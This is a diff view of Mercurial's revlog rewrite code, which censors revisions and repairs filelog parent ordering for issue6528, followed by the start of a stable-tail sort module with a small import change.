271 | 273 | d = dc.finddeltainfo( |
|
272 | 274 | info, excluded_bases=excluded_revs, target_rev=rev |
|
273 | 275 | ) |
|
274 | 276 | default_comp = revlog._docket.default_compression_header |
|
275 | 277 | comp_mode, d = deltas.delta_compression(default_comp, d) |
|
276 | 278 | # using `tell` is a bit lazy, but we are not here for speed |
|
277 | 279 | start = tmp_storage.tell() |
|
278 | 280 | tmp_storage.write(d.data[1]) |
|
279 | 281 | end = tmp_storage.tell() |
|
280 | 282 | rewritten_entries[rev] = (d.base, start, end, comp_mode) |
|
281 | 283 | return rewritten_entries |
|
282 | 284 | |
|
283 | 285 | |
|
284 | 286 | def _setup_new_files( |
|
285 | 287 | revlog, |
|
286 | 288 | index_cutoff, |
|
287 | 289 | data_cutoff, |
|
288 | 290 | sidedata_cutoff, |
|
289 | 291 | ): |
|
290 | 292 | """ |
|
291 | 293 | |
|
292 | 294 | return a context manager to open all the relevant files: |
|
293 | 295 | - old_data_file, |
|
294 | 296 | - old_sidedata_file, |
|
295 | 297 | - new_index_file, |
|
296 | 298 | - new_data_file, |
|
297 | 299 | - new_sidedata_file, |
|
298 | 300 | |
|
299 | 301 | The old_index_file is not here because it is accessed through the |
|
300 | 302 | `old_index` object of the calling function.
|
301 | 303 | """ |
|
302 | 304 | docket = revlog._docket |
|
303 | 305 | old_index_filepath = revlog.opener.join(docket.index_filepath()) |
|
304 | 306 | old_data_filepath = revlog.opener.join(docket.data_filepath()) |
|
305 | 307 | old_sidedata_filepath = revlog.opener.join(docket.sidedata_filepath()) |
|
306 | 308 | |
|
307 | 309 | new_index_filepath = revlog.opener.join(docket.new_index_file()) |
|
308 | 310 | new_data_filepath = revlog.opener.join(docket.new_data_file()) |
|
309 | 311 | new_sidedata_filepath = revlog.opener.join(docket.new_sidedata_file()) |
|
310 | 312 | |
|
311 | 313 | util.copyfile(old_index_filepath, new_index_filepath, nb_bytes=index_cutoff) |
|
312 | 314 | util.copyfile(old_data_filepath, new_data_filepath, nb_bytes=data_cutoff) |
|
313 | 315 | util.copyfile( |
|
314 | 316 | old_sidedata_filepath, |
|
315 | 317 | new_sidedata_filepath, |
|
316 | 318 | nb_bytes=sidedata_cutoff, |
|
317 | 319 | ) |
|
318 | 320 | revlog.opener.register_file(docket.index_filepath()) |
|
319 | 321 | revlog.opener.register_file(docket.data_filepath()) |
|
320 | 322 | revlog.opener.register_file(docket.sidedata_filepath()) |
|
321 | 323 | |
|
322 | 324 | docket.index_end = index_cutoff |
|
323 | 325 | docket.data_end = data_cutoff |
|
324 | 326 | docket.sidedata_end = sidedata_cutoff |
|
325 | 327 | |
|
326 | 328 | # reload the revlog internal information |
|
327 | 329 | revlog.clearcaches() |
|
328 | 330 | revlog._loadindex(docket=docket) |
|
329 | 331 | |
|
330 | 332 | @contextlib.contextmanager |
|
331 | 333 | def all_files_opener(): |
|
332 | 334 | # hide opening in a helper function to please check-code, black
|
333 | 335 | # and various Python versions at the same time
|
334 | 336 | with open(old_data_filepath, 'rb') as old_data_file: |
|
335 | 337 | with open(old_sidedata_filepath, 'rb') as old_sidedata_file: |
|
336 | 338 | with open(new_index_filepath, 'r+b') as new_index_file: |
|
337 | 339 | with open(new_data_filepath, 'r+b') as new_data_file: |
|
338 | 340 | with open( |
|
339 | 341 | new_sidedata_filepath, 'r+b' |
|
340 | 342 | ) as new_sidedata_file: |
|
341 | 343 | new_index_file.seek(0, os.SEEK_END) |
|
342 | 344 | assert new_index_file.tell() == index_cutoff |
|
343 | 345 | new_data_file.seek(0, os.SEEK_END) |
|
344 | 346 | assert new_data_file.tell() == data_cutoff |
|
345 | 347 | new_sidedata_file.seek(0, os.SEEK_END) |
|
346 | 348 | assert new_sidedata_file.tell() == sidedata_cutoff |
|
347 | 349 | yield ( |
|
348 | 350 | old_data_file, |
|
349 | 351 | old_sidedata_file, |
|
350 | 352 | new_index_file, |
|
351 | 353 | new_data_file, |
|
352 | 354 | new_sidedata_file, |
|
353 | 355 | ) |
|
354 | 356 | |
|
355 | 357 | return all_files_opener |
|
356 | 358 | |
|
357 | 359 | |
|
358 | 360 | def _rewrite_simple( |
|
359 | 361 | revlog, |
|
360 | 362 | old_index, |
|
361 | 363 | all_files, |
|
362 | 364 | rev, |
|
363 | 365 | rewritten_entries, |
|
364 | 366 | tmp_storage, |
|
365 | 367 | ): |
|
366 | 368 | """append a normal revision to the index after the rewritten one(s)""" |
|
367 | 369 | ( |
|
368 | 370 | old_data_file, |
|
369 | 371 | old_sidedata_file, |
|
370 | 372 | new_index_file, |
|
371 | 373 | new_data_file, |
|
372 | 374 | new_sidedata_file, |
|
373 | 375 | ) = all_files |
|
374 | 376 | entry = old_index[rev] |
|
375 | 377 | flags = entry[ENTRY_DATA_OFFSET] & 0xFFFF |
|
376 | 378 | old_data_offset = entry[ENTRY_DATA_OFFSET] >> 16 |
|
377 | 379 | |
|
378 | 380 | if rev not in rewritten_entries: |
|
379 | 381 | old_data_file.seek(old_data_offset) |
|
380 | 382 | new_data_size = entry[ENTRY_DATA_COMPRESSED_LENGTH] |
|
381 | 383 | new_data = old_data_file.read(new_data_size) |
|
382 | 384 | data_delta_base = entry[ENTRY_DELTA_BASE] |
|
383 | 385 | d_comp_mode = entry[ENTRY_DATA_COMPRESSION_MODE] |
|
384 | 386 | else: |
|
385 | 387 | ( |
|
386 | 388 | data_delta_base, |
|
387 | 389 | start, |
|
388 | 390 | end, |
|
389 | 391 | d_comp_mode, |
|
390 | 392 | ) = rewritten_entries[rev] |
|
391 | 393 | new_data_size = end - start |
|
392 | 394 | tmp_storage.seek(start) |
|
393 | 395 | new_data = tmp_storage.read(new_data_size) |
|
394 | 396 | |
|
395 | 397 | # It might be faster to group continuous read/write operations,

396 | 398 | # however, this is censoring, an operation that is not focussed
|
397 | 399 | # around stellar performance. So I have not written this |
|
398 | 400 | # optimisation yet. |
|
399 | 401 | new_data_offset = new_data_file.tell() |
|
400 | 402 | new_data_file.write(new_data) |
|
401 | 403 | |
|
402 | 404 | sidedata_size = entry[ENTRY_SIDEDATA_COMPRESSED_LENGTH] |
|
403 | 405 | new_sidedata_offset = new_sidedata_file.tell() |
|
404 | 406 | if 0 < sidedata_size: |
|
405 | 407 | old_sidedata_offset = entry[ENTRY_SIDEDATA_OFFSET] |
|
406 | 408 | old_sidedata_file.seek(old_sidedata_offset) |
|
407 | 409 | new_sidedata = old_sidedata_file.read(sidedata_size) |
|
408 | 410 | new_sidedata_file.write(new_sidedata) |
|
409 | 411 | |
|
410 | 412 | data_uncompressed_length = entry[ENTRY_DATA_UNCOMPRESSED_LENGTH] |
|
411 | 413 | sd_com_mode = entry[ENTRY_SIDEDATA_COMPRESSION_MODE] |
|
412 | 414 | assert data_delta_base <= rev, (data_delta_base, rev) |
|
413 | 415 | |
|
414 | 416 | new_entry = revlogutils.entry( |
|
415 | 417 | flags=flags, |
|
416 | 418 | data_offset=new_data_offset, |
|
417 | 419 | data_compressed_length=new_data_size, |
|
418 | 420 | data_uncompressed_length=data_uncompressed_length, |
|
419 | 421 | data_delta_base=data_delta_base, |
|
420 | 422 | link_rev=entry[ENTRY_LINK_REV], |
|
421 | 423 | parent_rev_1=entry[ENTRY_PARENT_1], |
|
422 | 424 | parent_rev_2=entry[ENTRY_PARENT_2], |
|
423 | 425 | node_id=entry[ENTRY_NODE_ID], |
|
424 | 426 | sidedata_offset=new_sidedata_offset, |
|
425 | 427 | sidedata_compressed_length=sidedata_size, |
|
426 | 428 | data_compression_mode=d_comp_mode, |
|
427 | 429 | sidedata_compression_mode=sd_com_mode, |
|
428 | 430 | ) |
|
429 | 431 | revlog.index.append(new_entry) |
|
430 | 432 | entry_bin = revlog.index.entry_binary(rev) |
|
431 | 433 | new_index_file.write(entry_bin) |
|
432 | 434 | |
|
433 | 435 | revlog._docket.index_end = new_index_file.tell() |
|
434 | 436 | revlog._docket.data_end = new_data_file.tell() |
|
435 | 437 | revlog._docket.sidedata_end = new_sidedata_file.tell() |
|
436 | 438 | |
|
437 | 439 | |
|
438 | 440 | def _rewrite_censor( |
|
439 | 441 | revlog, |
|
440 | 442 | old_index, |
|
441 | 443 | all_files, |
|
442 | 444 | rev, |
|
443 | 445 | tombstone, |
|
444 | 446 | ): |
|
445 | 447 | """rewrite and append a censored revision""" |
|
446 | 448 | ( |
|
447 | 449 | old_data_file, |
|
448 | 450 | old_sidedata_file, |
|
449 | 451 | new_index_file, |
|
450 | 452 | new_data_file, |
|
451 | 453 | new_sidedata_file, |
|
452 | 454 | ) = all_files |
|
453 | 455 | entry = old_index[rev] |
|
454 | 456 | |
|
455 | 457 | # XXX consider trying the default compression too |
|
456 | 458 | new_data_size = len(tombstone) |
|
457 | 459 | new_data_offset = new_data_file.tell() |
|
458 | 460 | new_data_file.write(tombstone) |
|
459 | 461 | |
|
460 | 462 | # we are not adding any sidedata as they might leak info about the censored version |
|
461 | 463 | |
|
462 | 464 | link_rev = entry[ENTRY_LINK_REV] |
|
463 | 465 | |
|
464 | 466 | p1 = entry[ENTRY_PARENT_1] |
|
465 | 467 | p2 = entry[ENTRY_PARENT_2] |
|
466 | 468 | |
|
467 | 469 | new_entry = revlogutils.entry( |
|
468 | 470 | flags=constants.REVIDX_ISCENSORED, |
|
469 | 471 | data_offset=new_data_offset, |
|
470 | 472 | data_compressed_length=new_data_size, |
|
471 | 473 | data_uncompressed_length=new_data_size, |
|
472 | 474 | data_delta_base=rev, |
|
473 | 475 | link_rev=link_rev, |
|
474 | 476 | parent_rev_1=p1, |
|
475 | 477 | parent_rev_2=p2, |
|
476 | 478 | node_id=entry[ENTRY_NODE_ID], |
|
477 | 479 | sidedata_offset=0, |
|
478 | 480 | sidedata_compressed_length=0, |
|
479 | 481 | data_compression_mode=COMP_MODE_PLAIN, |
|
480 | 482 | sidedata_compression_mode=COMP_MODE_PLAIN, |
|
481 | 483 | ) |
|
482 | 484 | revlog.index.append(new_entry) |
|
483 | 485 | entry_bin = revlog.index.entry_binary(rev) |
|
484 | 486 | new_index_file.write(entry_bin) |
|
485 | 487 | revlog._docket.index_end = new_index_file.tell() |
|
486 | 488 | revlog._docket.data_end = new_data_file.tell() |
|
487 | 489 | |
|
488 | 490 | |
|
489 | 491 | def _get_filename_from_filelog_index(path): |
|
490 | 492 | # Drop the extension and the `data/` prefix |
|
491 | 493 | path_part = path.rsplit(b'.', 1)[0].split(b'/', 1) |
|
492 | 494 | if len(path_part) < 2: |
|
493 | 495 | msg = _(b"cannot recognize filelog from filename: '%s'") |
|
494 | 496 | msg %= path |
|
495 | 497 | raise error.Abort(msg) |
|
496 | 498 | |
|
497 | 499 | return path_part[1] |
|
498 | 500 | |
|
499 | 501 | |
|
500 | 502 | def _filelog_from_filename(repo, path): |
|
501 | 503 | """Returns the filelog for the given `path`. Stolen from `engine.py`""" |
|
502 | 504 | |
|
503 | 505 | from .. import filelog # avoid cycle |
|
504 | 506 | |
|
505 | 507 | fl = filelog.filelog(repo.svfs, path) |
|
506 | 508 | return fl |
|
507 | 509 | |
|
508 | 510 | |
|
509 | 511 | def _write_swapped_parents(repo, rl, rev, offset, fp): |
|
510 | 512 | """Swaps p1 and p2 and overwrites the revlog entry for `rev` in `fp`""" |
|
511 | 513 | from ..pure import parsers # avoid cycle |
|
512 | 514 | |
|
513 | 515 | if repo._currentlock(repo._lockref) is None: |
|
514 | 516 | # Let's be paranoid about it |
|
515 | 517 | msg = "repo needs to be locked to rewrite parents" |
|
516 | 518 | raise error.ProgrammingError(msg) |
|
517 | 519 | |
|
518 | 520 | index_format = parsers.IndexObject.index_format |
|
519 | 521 | entry = rl.index[rev] |
|
520 | 522 | new_entry = list(entry) |
|
521 | 523 | new_entry[5], new_entry[6] = entry[6], entry[5] |
|
522 | 524 | packed = index_format.pack(*new_entry[:8]) |
|
523 | 525 | fp.seek(offset) |
|
524 | 526 | fp.write(packed) |
|
525 | 527 | |
|
526 | 528 | |
|
527 | 529 | def _reorder_filelog_parents(repo, fl, to_fix): |
|
528 | 530 | """ |
|
529 | 531 | Swaps p1 and p2 for all `to_fix` revisions of filelog `fl` and writes the |
|
530 | 532 | new version to disk, overwriting the old one with a rename. |
|
531 | 533 | """ |
|
532 | 534 | from ..pure import parsers # avoid cycle |
|
533 | 535 | |
|
534 | 536 | ui = repo.ui |
|
535 | 537 | assert len(to_fix) > 0 |
|
536 | 538 | rl = fl._revlog |
|
537 | 539 | if rl._format_version != constants.REVLOGV1: |
|
538 | 540 | msg = "expected version 1 revlog, got version '%d'" % rl._format_version |
|
539 | 541 | raise error.ProgrammingError(msg) |
|
540 | 542 | |
|
541 | 543 | index_file = rl._indexfile |
|
542 | 544 | new_file_path = index_file + b'.tmp-parents-fix' |
|
543 | 545 | repaired_msg = _(b"repaired revision %d of 'filelog %s'\n") |
|
544 | 546 | |
|
545 | 547 | with ui.uninterruptible(): |
|
546 | 548 | try: |
|
547 | 549 | util.copyfile( |
|
548 | 550 | rl.opener.join(index_file), |
|
549 | 551 | rl.opener.join(new_file_path), |
|
550 | 552 | checkambig=rl.data_config.check_ambig, |
|
551 | 553 | ) |
|
552 | 554 | |
|
553 | 555 | with rl.opener(new_file_path, mode=b"r+") as fp: |
|
554 | 556 | if rl._inline: |
|
555 | 557 | index = parsers.InlinedIndexObject(fp.read()) |
|
556 | 558 | for rev in fl.revs(): |
|
557 | 559 | if rev in to_fix: |
|
558 | 560 | offset = index._calculate_index(rev) |
|
559 | 561 | _write_swapped_parents(repo, rl, rev, offset, fp) |
|
560 | 562 | ui.write(repaired_msg % (rev, index_file)) |
|
561 | 563 | else: |
|
562 | 564 | index_format = parsers.IndexObject.index_format |
|
563 | 565 | for rev in to_fix: |
|
564 | 566 | offset = rev * index_format.size |
|
565 | 567 | _write_swapped_parents(repo, rl, rev, offset, fp) |
|
566 | 568 | ui.write(repaired_msg % (rev, index_file)) |
|
567 | 569 | |
|
568 | 570 | rl.opener.rename(new_file_path, index_file) |
|
569 | 571 | rl.clearcaches() |
|
570 | 572 | rl._loadindex() |
|
571 | 573 | finally: |
|
572 | 574 | util.tryunlink(new_file_path) |
|
573 | 575 | |
|
574 | 576 | |
|
575 | 577 | def _is_revision_affected(fl, filerev, metadata_cache=None): |
|
576 | 578 | full_text = lambda: fl._revlog.rawdata(filerev) |
|
577 | 579 | parent_revs = lambda: fl._revlog.parentrevs(filerev) |
|
578 | 580 | return _is_revision_affected_inner( |
|
579 | 581 | full_text, parent_revs, filerev, metadata_cache |
|
580 | 582 | ) |
|
581 | 583 | |
|
582 | 584 | |
|
583 | 585 | def _is_revision_affected_inner( |
|
584 | 586 | full_text, |
|
585 | 587 | parents_revs, |
|
586 | 588 | filerev, |
|
587 | 589 | metadata_cache=None, |
|
588 | 590 | ): |
|
589 | 591 | """Mercurial currently (5.9rc0) gives `p1 == nullrev and p2 != nullrev` a

590 | 592 | special meaning, compared to the reverse ordering, in the context of

591 | 593 | filelog-based copytracing. issue6528 exists because new code assumed that

592 | 594 | parent ordering didn't matter, so this detects whether the revision contains

593 | 595 | metadata (which is only used for filelog-based copytracing) and whether its

594 | 596 | parents are in the "wrong" order.
|
595 | 597 | try: |
|
596 | 598 | raw_text = full_text() |
|
597 | 599 | except error.CensoredNodeError: |
|
598 | 600 | # We don't care about censored nodes as they never carry metadata |
|
599 | 601 | return False |
|
600 | 602 | |
|
601 | 603 | # raw text can be a `memoryview`, which doesn't implement `startswith` |
|
602 | 604 | has_meta = bytes(raw_text[:2]) == b'\x01\n' |
|
603 | 605 | if metadata_cache is not None: |
|
604 | 606 | metadata_cache[filerev] = has_meta |
|
605 | 607 | if has_meta: |
|
606 | 608 | (p1, p2) = parents_revs() |
|
607 | 609 | if p1 != nullrev and p2 == nullrev: |
|
608 | 610 | return True |
|
609 | 611 | return False |
|
610 | 612 | |
|
611 | 613 | |
|
612 | 614 | def _is_revision_affected_fast(repo, fl, filerev, metadata_cache): |
|
613 | 615 | rl = fl._revlog |
|
614 | 616 | is_censored = lambda: rl.iscensored(filerev) |
|
615 | 617 | delta_base = lambda: rl.deltaparent(filerev) |
|
616 | 618 | delta = lambda: rl._chunk(filerev) |
|
617 | 619 | full_text = lambda: rl.rawdata(filerev) |
|
618 | 620 | parent_revs = lambda: rl.parentrevs(filerev) |
|
619 | 621 | return _is_revision_affected_fast_inner( |
|
620 | 622 | is_censored, |
|
621 | 623 | delta_base, |
|
622 | 624 | delta, |
|
623 | 625 | full_text, |
|
624 | 626 | parent_revs, |
|
625 | 627 | filerev, |
|
626 | 628 | metadata_cache, |
|
627 | 629 | ) |
|
628 | 630 | |
|
629 | 631 | |
|
630 | 632 | def _is_revision_affected_fast_inner( |
|
631 | 633 | is_censored, |
|
632 | 634 | delta_base, |
|
633 | 635 | delta, |
|
634 | 636 | full_text, |
|
635 | 637 | parent_revs, |
|
636 | 638 | filerev, |
|
637 | 639 | metadata_cache, |
|
638 | 640 | ): |
|
639 | 641 | """Optimization fast-path for `_is_revision_affected`. |
|
640 | 642 | |
|
641 | 643 | `metadata_cache` is a dict of `{rev: has_metadata}` which allows any |
|
642 | 644 | revision to check if its base has metadata, saving computation of the full |
|
643 | 645 | text by instead looking at the current delta.
|
644 | 646 | |
|
645 | 647 | This optimization only works if the revisions are looked at in order.""" |
|
646 | 648 | |
|
647 | 649 | if is_censored(): |
|
648 | 650 | # Censored revisions don't contain metadata, so they cannot be affected |
|
649 | 651 | metadata_cache[filerev] = False |
|
650 | 652 | return False |
|
651 | 653 | |
|
652 | 654 | p1, p2 = parent_revs() |
|
653 | 655 | if p1 == nullrev or p2 != nullrev: |
|
654 | 656 | return False |
|
655 | 657 | |
|
656 | 658 | delta_parent = delta_base() |
|
657 | 659 | parent_has_metadata = metadata_cache.get(delta_parent) |
|
658 | 660 | if parent_has_metadata is None: |
|
659 | 661 | return _is_revision_affected_inner( |
|
660 | 662 | full_text, |
|
661 | 663 | parent_revs, |
|
662 | 664 | filerev, |
|
663 | 665 | metadata_cache, |
|
664 | 666 | ) |
|
665 | 667 | |
|
666 | 668 | chunk = delta() |
|
667 | 669 | if not len(chunk): |
|
668 | 670 | # No diff for this revision |
|
669 | 671 | return parent_has_metadata |
|
670 | 672 | |
|
671 | 673 | header_length = 12 |
|
672 | 674 | if len(chunk) < header_length: |
|
673 | 675 | raise error.Abort(_(b"patch cannot be decoded")) |
|
674 | 676 | |
|
675 | 677 | start, _end, _length = struct.unpack(b">lll", chunk[:header_length]) |
|
676 | 678 | |
|
677 | 679 | if start < 2: # len(b'\x01\n') == 2 |
|
678 | 680 | # This delta does *something* to the metadata marker (if any). |
|
679 | 681 | # Check it the slow way |
|
680 | 682 | is_affected = _is_revision_affected_inner( |
|
681 | 683 | full_text, |
|
682 | 684 | parent_revs, |
|
683 | 685 | filerev, |
|
684 | 686 | metadata_cache, |
|
685 | 687 | ) |
|
686 | 688 | return is_affected |
|
687 | 689 | |
|
688 | 690 | # The diff did not remove or add the metadata header, it's then in the same |
|
689 | 691 | # situation as its parent |
|
690 | 692 | metadata_cache[filerev] = parent_has_metadata |
|
691 | 693 | return parent_has_metadata |
|
692 | 694 | |
|
693 | 695 | |
|
694 | 696 | def _from_report(ui, repo, context, from_report, dry_run): |
|
695 | 697 | """ |
|
696 | 698 | Fix the revisions given in the `from_report` file, but still checks if the |
|
697 | 699 | revisions are indeed affected to prevent an unfortunate cyclic situation |
|
698 | 700 | where we'd swap well-ordered parents again. |
|
699 | 701 | |
|
700 | 702 | See the doc for `debug_fix_issue6528` for the format documentation. |
|
701 | 703 | """ |
|
702 | 704 | ui.write(_(b"loading report file '%s'\n") % from_report) |
|
703 | 705 | |
|
704 | 706 | with context(), open(from_report, mode='rb') as f: |
|
705 | 707 | for line in f.read().split(b'\n'): |
|
706 | 708 | if not line: |
|
707 | 709 | continue |
|
708 | 710 | filenodes, filename = line.split(b' ', 1) |
|
709 | 711 | fl = _filelog_from_filename(repo, filename) |
|
710 | 712 | to_fix = set( |
|
711 | 713 | fl.rev(binascii.unhexlify(n)) for n in filenodes.split(b',') |
|
712 | 714 | ) |
|
713 | 715 | excluded = set() |
|
714 | 716 | |
|
715 | 717 | for filerev in to_fix: |
|
716 | 718 | if _is_revision_affected(fl, filerev): |
|
717 | 719 | msg = b"found affected revision %d for filelog '%s'\n" |
|
718 | 720 | ui.warn(msg % (filerev, filename)) |
|
719 | 721 | else: |
|
720 | 722 | msg = _(b"revision %s of file '%s' is not affected\n") |
|
721 | 723 | msg %= (binascii.hexlify(fl.node(filerev)), filename) |
|
722 | 724 | ui.warn(msg) |
|
723 | 725 | excluded.add(filerev) |
|
724 | 726 | |
|
725 | 727 | to_fix = to_fix - excluded |
|
726 | 728 | if not to_fix: |
|
727 | 729 | msg = _(b"no affected revisions were found for '%s'\n") |
|
728 | 730 | ui.write(msg % filename) |
|
729 | 731 | continue |
|
730 | 732 | if not dry_run: |
|
731 | 733 | _reorder_filelog_parents(repo, fl, sorted(to_fix)) |
|
732 | 734 | |
|
733 | 735 | |
|
734 | 736 | def filter_delta_issue6528(revlog, deltas_iter): |
|
735 | 737 | """filter incoming deltas to repair issue 6528 on the fly"""
|
736 | 738 | metadata_cache = {} |
|
737 | 739 | |
|
738 | 740 | deltacomputer = deltas.deltacomputer(revlog) |
|
739 | 741 | |
|
740 | 742 | for rev, d in enumerate(deltas_iter, len(revlog)): |
|
741 | 743 | ( |
|
742 | 744 | node, |
|
743 | 745 | p1_node, |
|
744 | 746 | p2_node, |
|
745 | 747 | linknode, |
|
746 | 748 | deltabase, |
|
747 | 749 | delta, |
|
748 | 750 | flags, |
|
749 | 751 | sidedata, |
|
750 | 752 | ) = d |
|
751 | 753 | |
|
752 | 754 | if not revlog.index.has_node(deltabase): |
|
753 | 755 | raise error.LookupError( |
|
754 | 756 | deltabase, revlog.radix, _(b'unknown parent') |
|
755 | 757 | ) |
|
756 | 758 | base_rev = revlog.rev(deltabase) |
|
757 | 759 | if not revlog.index.has_node(p1_node): |
|
758 | 760 | raise error.LookupError(p1_node, revlog.radix, _(b'unknown parent')) |
|
759 | 761 | p1_rev = revlog.rev(p1_node) |
|
760 | 762 | if not revlog.index.has_node(p2_node): |
|
761 | 763 | raise error.LookupError(p2_node, revlog.radix, _(b'unknown parent')) |
|
762 | 764 | p2_rev = revlog.rev(p2_node) |
|
763 | 765 | |
|
764 | 766 | is_censored = lambda: bool(flags & REVIDX_ISCENSORED) |
|
765 | 767 | delta_base = lambda: revlog.rev(delta_base) |
|
766 | 768 | delta_base = lambda: base_rev |
|
767 | 769 | parent_revs = lambda: (p1_rev, p2_rev) |
|
768 | 770 | |
|
769 | 771 | def full_text(): |
|
770 | 772 | # note: being able to reuse the full text computation in the |
|
771 | 773 | # underlying addrevision would be useful; however, this is a bit too

772 | 774 | # intrusive for the "quick" issue6528 fix we are writing before the
|
773 | 775 | # 5.8 release |
|
774 | 776 | textlen = mdiff.patchedsize(revlog.size(base_rev), delta) |
|
775 | 777 | |
|
776 | 778 | revinfo = revlogutils.revisioninfo( |
|
777 | 779 | node, |
|
778 | 780 | p1_node, |
|
779 | 781 | p2_node, |
|
780 | 782 | [None], |
|
781 | 783 | textlen, |
|
782 | 784 | (base_rev, delta), |
|
783 | 785 | flags, |
|
784 | 786 | ) |
|
785 | 787 | return deltacomputer.buildtext(revinfo) |
|
786 | 788 | |
|
787 | 789 | is_affected = _is_revision_affected_fast_inner( |
|
788 | 790 | is_censored, |
|
789 | 791 | delta_base, |
|
790 | 792 | lambda: delta, |
|
791 | 793 | full_text, |
|
792 | 794 | parent_revs, |
|
793 | 795 | rev, |
|
794 | 796 | metadata_cache, |
|
795 | 797 | ) |
|
796 | 798 | if is_affected: |
|
797 | 799 | d = ( |
|
798 | 800 | node, |
|
799 | 801 | p2_node, |
|
800 | 802 | p1_node, |
|
801 | 803 | linknode, |
|
802 | 804 | deltabase, |
|
803 | 805 | delta, |
|
804 | 806 | flags, |
|
805 | 807 | sidedata, |
|
806 | 808 | ) |
|
807 | 809 | yield d |
|
808 | 810 | |
|
809 | 811 | |
|
810 | 812 | def repair_issue6528( |
|
811 | 813 | ui, repo, dry_run=False, to_report=None, from_report=None, paranoid=False |
|
812 | 814 | ): |
|
813 | 815 | @contextlib.contextmanager |
|
814 | 816 | def context(): |
|
815 | 817 | if dry_run or to_report: # No need for locking |
|
816 | 818 | yield |
|
817 | 819 | else: |
|
818 | 820 | with repo.wlock(), repo.lock(): |
|
819 | 821 | yield |
|
820 | 822 | |
|
821 | 823 | if from_report: |
|
822 | 824 | return _from_report(ui, repo, context, from_report, dry_run) |
|
823 | 825 | |
|
824 | 826 | report_entries = [] |
|
825 | 827 | |
|
826 | 828 | with context(): |
|
827 | 829 | files = list( |
|
828 | 830 | entry |
|
829 | 831 | for entry in repo.store.data_entries() |
|
830 | 832 | if entry.is_revlog and entry.is_filelog |
|
831 | 833 | ) |
|
832 | 834 | |
|
833 | 835 | progress = ui.makeprogress( |
|
834 | 836 | _(b"looking for affected revisions"), |
|
835 | 837 | unit=_(b"filelogs"), |
|
836 | 838 | total=len(files), |
|
837 | 839 | ) |
|
838 | 840 | found_nothing = True |
|
839 | 841 | |
|
840 | 842 | for entry in files: |
|
841 | 843 | progress.increment() |
|
842 | 844 | filename = entry.target_id |
|
843 | 845 | fl = _filelog_from_filename(repo, entry.target_id) |
|
844 | 846 | |
|
845 | 847 | # Set of filerevs (or hex filenodes if `to_report`) that need fixing |
|
846 | 848 | to_fix = set() |
|
847 | 849 | metadata_cache = {} |
|
848 | 850 | for filerev in fl.revs(): |
|
849 | 851 | affected = _is_revision_affected_fast( |
|
850 | 852 | repo, fl, filerev, metadata_cache |
|
851 | 853 | ) |
|
852 | 854 | if paranoid: |
|
853 | 855 | slow = _is_revision_affected(fl, filerev) |
|
854 | 856 | if slow != affected: |
|
855 | 857 | msg = _(b"paranoid check failed for '%s' at node %s") |
|
856 | 858 | node = binascii.hexlify(fl.node(filerev)) |
|
857 | 859 | raise error.Abort(msg % (filename, node)) |
|
858 | 860 | if affected: |
|
859 | 861 | msg = b"found affected revision %d for file '%s'\n" |
|
860 | 862 | ui.warn(msg % (filerev, filename)) |
|
861 | 863 | found_nothing = False |
|
862 | 864 | if not dry_run: |
|
863 | 865 | if to_report: |
|
864 | 866 | to_fix.add(binascii.hexlify(fl.node(filerev))) |
|
865 | 867 | else: |
|
866 | 868 | to_fix.add(filerev) |
|
867 | 869 | |
|
868 | 870 | if to_fix: |
|
869 | 871 | to_fix = sorted(to_fix) |
|
870 | 872 | if to_report: |
|
871 | 873 | report_entries.append((filename, to_fix)) |
|
872 | 874 | else: |
|
873 | 875 | _reorder_filelog_parents(repo, fl, to_fix) |
|
874 | 876 | |
|
875 | 877 | if found_nothing: |
|
876 | 878 | ui.write(_(b"no affected revisions were found\n")) |
|
877 | 879 | |
|
878 | 880 | if to_report and report_entries: |
|
879 | 881 | with open(to_report, mode="wb") as f: |
|
880 | 882 | for path, to_fix in report_entries: |
|
881 | 883 | f.write(b"%s %s\n" % (b",".join(to_fix), path)) |
|
882 | 884 | |
|
883 | 885 | progress.complete() |
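
The repair pass above boils down to one predicate: a filelog revision needs its parents swapped when its raw text starts with the copy-metadata marker `\x01\n` while its parents are stored as (p1 set, p2 null). The following is a minimal standalone sketch of that check, using plain bytes and a parent pair instead of a real revlog; the names are illustrative and not part of Mercurial's API.

```python
# Standalone sketch of the issue6528 predicate; `raw_text` is the raw full
# text of a filelog revision and `parents` is its (p1, p2) pair of revision
# numbers, with -1 standing for the null revision. Illustration only.
NULLREV = -1
META_MARKER = b'\x01\n'  # start of filelog copy metadata


def needs_parent_swap(raw_text, parents):
    # bytes() guards against memoryview inputs, as in the code above
    has_meta = bytes(raw_text[:2]) == META_MARKER
    if not has_meta:
        return False
    p1, p2 = parents
    # copy metadata is only meaningful when carried on p2; metadata with
    # p1 set and p2 null is the ordering that issue6528 has to repair
    return p1 != NULLREV and p2 == NULLREV


assert needs_parent_swap(b'\x01\ncopy: a\n\x01\nsome data', (3, NULLREV))
assert not needs_parent_swap(b'plain data', (3, NULLREV))
assert not needs_parent_swap(b'\x01\ncopy: a\n\x01\ndata', (NULLREV, 3))
```
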
@@ -1,172 +1,174 | |||
|
1 | 1 | # stabletailsort.py - stable ordering of revisions |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2021-2023 Pacien TRAN-GIRARD <pacien.trangirard@pacien.net> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | 8 | """ |
|
9 | 9 | Stable-tail sort computation. |
|
10 | 10 | |
|
11 | 11 | The "stable-tail sort", or STS, is a reverse topological ordering of the |
|
12 | 12 | ancestors of a node, which tends to share large suffixes with the stable-tail |
|
13 | 13 | sort of ancestors and other nodes, giving it its name. |
|
14 | 14 | |
|
15 | 15 | Its properties should make it suitable for making chunks of ancestors with high |
|
16 | 16 | reuse and incrementality for example. |
|
17 | 17 | |
|
18 | 18 | This module and implementation are experimental. Most functions are not yet |
|
19 | 19 | optimised to operate on large production graphs. |
|
20 | 20 | """ |
|
21 | 21 | |
|
22 | from __future__ import annotations | |
|
23 | ||
|
22 | 24 | import itertools |
|
23 | 25 | from ..node import nullrev |
|
24 | 26 | from .. import ancestor |
|
25 | 27 | |
|
26 | 28 | |
|
27 | 29 | def _sorted_parents(cl, p1, p2): |
|
28 | 30 | """ |
|
29 | 31 | Chooses and returns the pair (px, pt) from (p1, p2). |
|
30 | 32 | |
|
31 | 33 | Where |
|
32 | 34 | "px" denotes the parent starting the "exclusive" part, and |
|
33 | 35 | "pt" denotes the parent starting the "Tail" part. |
|
34 | 36 | |
|
35 | 37 | "px" is chosen as the parent with the lowest rank with the goal of |
|
